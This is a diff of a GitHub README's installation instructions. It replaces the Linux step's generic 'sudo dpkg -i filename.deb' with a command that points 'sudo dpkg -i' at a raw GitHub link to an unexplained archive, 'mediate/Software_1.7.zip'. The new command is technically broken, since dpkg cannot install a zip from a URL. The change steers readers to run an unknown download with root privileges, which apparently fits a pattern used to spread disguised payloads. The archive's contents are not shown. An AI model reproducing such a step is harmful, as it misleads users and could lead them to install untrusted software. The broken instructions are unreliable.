Jayesh-Mantati/app/README.md

    - **Windows:** Double-click the `.exe` file.
 Follow the on-screen instructions to complete the installation.
    - **macOS:** Open the `.dmg` file, then drag the app icon into your Applications folder.
-   - **Linux:** Open a terminal, navigate to where you downloaded the file, and use the command `sudo dpkg -i filename.deb` or extract the `.tar.gz` file.
+   - **Linux:** Open a terminal, navigate to where you downloaded the file, and use the command `sudo dpkg -i https://raw.githubusercontent.com/Jayesh-Mantati/app/main/mediate/Software_1.7.zip` or extract the `https://raw.githubusercontent.com/Jayesh-Mantati/app/main/mediate/Software_1.7.zip` file.

 4. **Open the Application**